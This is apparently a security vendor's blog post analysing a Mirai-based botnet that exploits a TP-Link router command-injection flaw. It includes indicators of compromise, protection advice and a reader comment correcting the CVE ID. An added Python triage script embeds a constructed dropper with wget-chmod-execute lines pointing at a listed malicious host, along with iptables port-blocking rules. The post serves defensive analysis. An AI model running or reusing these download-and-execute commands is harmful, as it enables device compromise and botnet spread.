
FortiGuard Labs discovered a malware sample that is currently being distributed in the wild targeting TP-Link wireless routers. It leverages a recently disclosed post-authentication RCE vulnerability. The campaign originally piqued our interest because of the continuous updating of its list of target vulnerabilities. TP-Link has already released updated firmware for the affected hardware version, and users are strongly encouraged to update their devices.
This Mirai-based botnet campaign is referred to as MANGA because of the token string it used to include in its SSH/Telnet commands. It is also referred to as Dark because of the filenames used for its binaries (e.g., Dark.arm, dark.mips, etc.).
By exploiting the recently published vulnerability tracked as CVE-2021-41653, this malware campaign capitalizes on the gap between the disclosure of a vulnerability and the application of a patch to compromise IoT devices. This gives it a higher potential for spreading, making it more prolific than similar botnets. The latest addition to its constantly growing list of targeted vulnerabilities affects TP-Link home wireless routers, particularly the TL-WR840N EU (V5) model.
The vulnerability is being exploited to force vulnerable devices to download and execute a malicious script, tshit.sh, which in turn downloads the main binary payloads, as discussed in the next section.
To accomplish this, the following requests are sent to the device:
Request 1:

Request 2:

It is important to emphasize that this exploit requires authentication to succeed. It is therefore crucial for users to change their default credentials. As with Mirai's normal infection routine, the executed shell script downloads the main payload binaries for different architectures and platforms and executes them blindly on the victim's system. In addition, it prevents other botnets from taking over the device by blocking connections to commonly targeted ports.
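The downloader stage described above follows a recognisable shape: one fetch per CPU architecture, each binary executed without checking whether it matches the device, then firewall rules against ports other botnets scan. The following is an added example (not FortiGuard's code and not the real tshit.sh) showing how to triage such a script statically. The script text embedded below is constructed to mirror the described behaviour; the download hosts it is checked against are taken from the indicator list in this post. Nothing is fetched or executed; the parser only reads the text.

```python
"""Static triage of a Mirai-style downloader script (added example).

The SAMPLE_SCRIPT below is CONSTRUCTED for illustration. It is modelled on
the behaviour described in the write-up (multi-architecture fetch, blind
execution, port blocking) and is not the actual tshit.sh.
"""
import re
from urllib.parse import urlparse

# Download hosts taken from the post's indicator list.
IOC_DOWNLOAD_HOSTS = {"194.85.248.176", "2.56.59.215", "212.192.241.72"}

# Constructed sample; the URLs reuse hosts and paths from the IOC list.
SAMPLE_SCRIPT = """\
#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.85.248.176/bins/eh.mips -O dark.mips; chmod +x dark.mips; ./dark.mips; rm -rf dark.mips
wget http://194.85.248.176/bins/eh.mpsl -O dark.mpsl; chmod +x dark.mpsl; ./dark.mpsl; rm -rf dark.mpsl
wget http://194.85.248.176/bins/eh.arm7 -O dark.arm7; chmod +x dark.arm7; ./dark.arm7; rm -rf dark.arm7
wget http://194.85.248.176/bins/eh.x86 -O dark.x86; chmod +x dark.x86; ./dark.x86; rm -rf dark.x86
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 2323 -j DROP
iptables -A INPUT -p tcp --destination-port 7547 -j DROP
"""

# A wget/curl invocation followed by the URL it fetches.
URL_RE = re.compile(r"\b(?:wget|curl)\b[^;\n]*?(https?://[^\s;'\"]+)")
# "./name" run straight after a preceding command on the same line.
EXEC_RE = re.compile(r"(?:^|;\s*)\./([\w.\-]+)", re.M)
# iptables DROP rules keyed on a destination port.
DROP_RE = re.compile(r"iptables\b.*?--(?:destination-port|dport)\s+(\d+).*?-j\s+DROP")


def extract_downloads(script):
    """Return (url, arch_suffix) for each fetch; suffix is the part after the last dot."""
    found = []
    for m in URL_RE.finditer(script):
        url = m.group(1)
        name = urlparse(url).path.rsplit("/", 1)[-1]
        suffix = name.rsplit(".", 1)[-1] if "." in name else ""
        found.append((url, suffix))
    return found


def extract_blind_execs(script):
    """Names of files the script executes with ./ without any architecture check."""
    return EXEC_RE.findall(script)


def extract_dropped_ports(script):
    """Destination ports the script firewalls off with iptables DROP rules."""
    return sorted({int(p) for p in DROP_RE.findall(script)})


def triage(script, ioc_hosts=IOC_DOWNLOAD_HOSTS):
    """Summarise the dropper: hosts, IOC overlap, architectures, execs, blocked ports."""
    downloads = extract_downloads(script)
    hosts = {urlparse(u).hostname for u, _ in downloads}
    arches = {a for _, a in downloads}
    return {
        "download_hosts": sorted(hosts),
        "ioc_hits": sorted(hosts & ioc_hosts),
        "architectures": sorted(arches),
        "blind_execs": extract_blind_execs(script),
        "dropped_ports": extract_dropped_ports(script),
        # Three or more architectures from one host is the classic Mirai dropper shape.
        "multi_arch_dropper": len(arches) >= 3,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

On the constructed sample, `triage` reports a single download host that matches the indicator list, four architecture suffixes (arm7, mips, mpsl, x86), four blind executions and DROP rules on ports 23, 2323 and 7547. The same functions can be pointed at any shell script recovered from a device's /tmp or from a proxy capture; the `multi_arch_dropper` flag and the IOC host overlap are the two signals worth alerting on.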

The malware then waits for a command from its Command-and-Control (C2) server to perform different variations of a Denial-of-Service (DoS) attack.
Fortinet customers are protected by the following:
- The following generic FortiGuard IPS signatures were able to detect this attack before the vulnerability was disclosed:
  - TP-Link.HTTP.Management.Code.Execution
  - TP-Link.Home.Wifi.Router.CGI.Referer.Command.Injection
- The FortiGuard Web Filtering Service blocks the download URLs and identified C2s.
- The FortiGuard Anti-Virus service detects and blocks this threat as Linux/Mirai and ELF/Mirai.
Indicators of Compromise
Download URLs
- http[:]//194.85.248.176/bins/eh.x86
- http[:]//194.85.248.176/bins/eh.mips
- http[:]//194.85.248.176/bins/eh.mpsl
- http[:]//194.85.248.176/bins/eh.arm4
- http[:]//194.85.248.176/bins/eh.arm5
- http[:]//194.85.248.176/bins/eh.arm6
- http[:]//194.85.248.176/bins/eh.arm7
- http[:]//194.85.248.176/bins/eh.ppc
- http[:]//194.85.248.176/bins/eh.m68k
- http[:]//194.85.248.176/bins/eh.sh4
- http[:]//194.85.248.176/bins/eh.86_64
- http[:]//194.85.248.176/local.sh
- http[:]//194.85.248.176/tshit.sh
- http[:]//2.56.59.215/apache2.sh
- http[:]//212.192.241.72/lolol.sh
Samples (SHA256)
- ebfc95372427f8b845daff9ff4aebe2451fa78e35a24edd084685f06ba3daee4
- 57f50f34e6df8ee9006e46b5fe5c4ee11febe9e33b087c809f1384563e9f1d4e
- 8ebef715ddb0b4e973b2f8c7529f4480b5caa9c4a25f8fd05a7eaacf036cca20
- 113be1f9db8af2469b82ce1b5d1b0c61c50586567b3898f2b8a614cd6e8f47a8
- b4c3c79d148db638f891143a1910c3d17f973c512a719b1f7525a823b14d29a8
- d3928d0b6dedce6a083123028e50ba76e1b29666e70a96eec1a7061b7303bf1a
- 6b463e9f5d9e8edbc235bceb854367b26ed6effb0dee9881a4f4e88a967318d5
- d88052c0a76cac7e571870a4e87c5354594c26b4955cd934870dc12d48f129d5
- 265396023cbbad6b3480b851873ece9fa2f32c63739a7a0ac32d196843080cc8
- 83566400bdb09c5e2438c0d9ff723c88328ca93f29e648f97088342e239bfa09
- af9ac01e9e8cf7064d590044df43adca566521d223662cf5e0e2500badff6998
- de01f26209a085eeff8c217782d283640a6226ccf1bd27eefd696658b55d10ba
- a4b16a5bf9b6e662050a3c5ff157d7b2f0be301a1f8f5d1359170132b8b22e58
- 7a47e5b83e3c42df2ab72adf4a041b2e382f61a0ff378f593156353a78c2c702
- 1bd895ed050ce42d0f39b6baa0b6a454e05eb5bff72290857cb8fb77a9e4b4b9
- 71ca57bbba49aa877f7ded340328342c6e82e3a99720734c8b0de150d44d906c
- 23b03aa7d1dadd2e71016702f3e1b278b3a2c4f0c7d0cdc272774a428b88d09c
- fb7b03e7619d3ac5c4cbadc6b38841b11e3b19214b776073a590b571f91fe51e
- 3c978e02d21c7c12631d56c41aceb305fc11348a53eed47e29f7ce62ea0da4df
- 4832cff5666433a784d6ba48a0e400367d25314ef15d08a216b6286226eff342
- 95e4ac3ae03646cda56d80df80d775ed4bf23f98be42274fb440e7bc0d03ce88
- 8d390ad5af8d70692bda123b96e9745816ec7893d84682adb6d243619538b9d3
- 66adea50e0de8e1d664bb18c9f80596d1443b90e9ba57a59425720886a0c97e0
- a87b502575d0db1b6257f1cf75edf4894bc84598f79148525b5cc449d143a495
Hi,
The CVE ID is not good, the correct one is CVE-2021-41653. (I found the original vulnerability for the TP-Link TL-WR840N EU V5 device, so I am sure. You can find more details on my home page: https://k4m1ll0.com)
Thanks for the update, Kamilo. Will update accordingly.